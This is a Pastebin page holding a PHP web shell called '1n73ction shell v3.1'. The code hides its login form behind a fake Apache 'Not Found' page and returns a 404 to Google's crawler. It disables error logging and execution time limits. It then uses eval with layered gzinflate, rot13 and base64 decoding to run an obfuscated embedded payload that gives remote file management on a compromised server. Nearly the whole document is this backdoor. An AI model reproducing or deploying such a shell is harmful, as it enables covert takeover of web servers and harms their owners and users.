Advertisement
FeRR4L

1n73ction shell

Jan 18th, 2014
416
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.07 KB | None | 0 0
  1. <?php
  2. /* (1n73ction shell v3.1 by x'1n73ct|default pass:" hidden ") */
  3. $auth_pass = "662f707d5491e9bce8238a6c0be92190";
  4. $color = "#00ff00";
  5. $default_action = 'FilesMan';
  6. @define('SELF_PATH', __FILE__);
  7. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  8.     header('HTTP/1.0 404 Not Found');
  9.     exit;
  10. }
  11. @session_start();
  12. @error_reporting(0);
  13. @ini_set('error_log',NULL);
  14. @ini_set('log_errors',0);
  15. @ini_set('max_execution_time',0);
  16. @ini_set('output_buffering',0);
  17. @ini_set('display_errors', 0);
  18. @set_time_limit(0);
  19. @set_magic_quotes_runtime(0);
  20. @define('VERSION', '2.1');
  21. if( get_magic_quotes_gpc() ) {
  22.     function stripslashes_array($array) {
  23.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  24.     }
  25.     $_POST = stripslashes_array($_POST);
  26. }
  27. function printLogin() {
  28.     ?>
  29. <h1>Not Found</h1>
  30. <p>The requested URL was not found on this server.</p>
  31. <hr>
  32. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  33.     <style>
  34.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  35.     </style>
  36.     <center>
  37.     <form method=post>
  38.     <input type=password name=pass>
  39.     </form></center>
  40.     <?php
  41.     exit;
  42. }
  43. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  44.     if( empty( $auth_pass ) ||
  45.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  46.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  47.     else
  48.         printLogin();
  49.       @ini_set('output_buffering',0);
  50. @ini_set('display_errors', 0);
  51. function x($inject){eval("\$z=gz" . "inf" . "la" . "te(s" . "t" . "r_r" . "ot" . "13(ba" . "se" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "de(st" . "r" . "_" . "r" . "o" . "t" . "13(" . "gzi" . "nf" . "lat" . "e(" . "bas" . "e6" . "4_d" . "ec" . "ode(\$inject))))));eval(\$z);");}
  52. x("DczdFkIwAADgB3Kx4+f4uehiJyJFM0bcjYPKqGbFPH19D/Adch2iLn+Qan8XlupmvkrlMEVX3NtyDS2gc9nTGF4X0yHDKSAFnPHHOkwhFNw5v0XIqMdyAylyc5r0ReRkzlhmX8y5Fizfz5rpiQsaz7jdWXZDUbJdcN2KqfRPLWnrJ6t88P9SpB5TNIws6KCxxSXvo3EugK2kQKNA2M66mLG72/0A");
  53. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement